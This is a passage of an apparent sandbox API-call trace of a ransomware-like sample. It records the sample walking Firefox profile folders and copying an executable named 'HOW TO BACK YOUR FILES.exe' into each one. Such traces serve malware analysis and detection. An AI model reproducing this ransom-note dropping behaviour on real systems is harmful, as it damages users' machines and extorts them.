to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.191] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.191] GetLastError () returned 0x0 [0109.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.191] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.191] CloseHandle (hObject=0x120) returned 1 [0109.191] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.191] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x7204b700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7204b700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.192] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.192] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.192] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0109.192] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0109.192] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0109.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0109.192] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0109.192] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.192] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.193] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.193] GetLastError () returned 0x0 [0109.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.193] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.193] CloseHandle (hObject=0x120) returned 1 [0109.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.193] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x50596420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50596420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.193] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.193] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.194] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0109.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0109.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0109.194] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0109.194] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0109.194] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.194] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.195] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.195] GetLastError () returned 0x0 [0109.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.195] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.195] CloseHandle (hObject=0x120) returned 1 [0109.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.195] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.195] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x50596420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50596420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.195] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.195] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.195] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0109.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0109.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0109.196] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0109.196] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0109.196] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.196] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.196] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.197] GetLastError () returned 0x0 [0109.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.197] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.197] CloseHandle (hObject=0x120) returned 1 [0109.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.197] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x72071860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x72071860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.197] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.197] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.197] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0109.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0109.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0109.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0109.197] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0109.197] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.197] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.198] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.198] GetLastError () returned 0x0 [0109.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.198] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.198] CloseHandle (hObject=0x120) returned 1 [0109.198] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.198] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x505bc580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x505bc580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.199] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.199] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.199] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0109.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0109.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0109.199] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0109.199] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0109.199] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.199] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.200] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.200] GetLastError () returned 0x0 [0109.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.200] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.200] CloseHandle (hObject=0x120) returned 1 [0109.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.200] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x50608840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50608840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.200] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.200] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.200] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0109.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0109.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0109.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0109.201] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0109.201] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.201] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.201] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.202] GetLastError () returned 0x0 [0109.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.202] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.202] CloseHandle (hObject=0x120) returned 1 [0109.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.202] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.202] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x72071860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x72071860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.202] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.202] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.202] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0109.202] HeapFree (in: hHeap=0x2b0000, 